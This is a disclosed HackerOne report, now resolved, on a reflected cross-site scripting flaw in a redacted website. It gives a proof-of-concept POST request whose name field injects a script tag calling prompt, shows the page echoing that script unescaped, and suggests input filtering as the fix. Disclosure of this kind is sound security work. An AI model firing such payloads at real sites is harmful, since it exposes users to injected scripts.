reflected xss @ www.█████████
Medium
Vulnerability Details
**Summary:**
https://www.██████████/█████████is vulnerable to cross site scripting attacks.
**PoC**
Sending the following `POST` request to `/█████` triggers the xss:
```
%3d=%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3dTOP_OF_RECORD%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d&ATprogram=1&E=&fullname=nbfgkjaa'%22()%26%25<geeknik><ScRiPt%20>prompt(/XSS/)</ScRiPt>&glomf=1&glorf=1&numusers=xmkucffw&org=1&other=1&phone=555-666-0606&recType%21=-██████-&source=1&sponsorglomf=1&sponsorname=xmkucffw&sponsorphone=555-666-0606
```
This is reflected in the page source:
```
A request has successfully been entered for nbfgkjaa'"()&%<geeknik><ScRiPt >prompt(/XSS/)</ScRiPt>.</h3><h3>A confirmation email will shortly be sent to 1.</h3>
```
**Suggested Mitigation/Remediation Actions**
This script should filter metacharacters from user input.
Actions
View on HackerOneReport Stats
- Report ID: 225020
- State: Closed
- Substate: resolved
- Upvotes: 5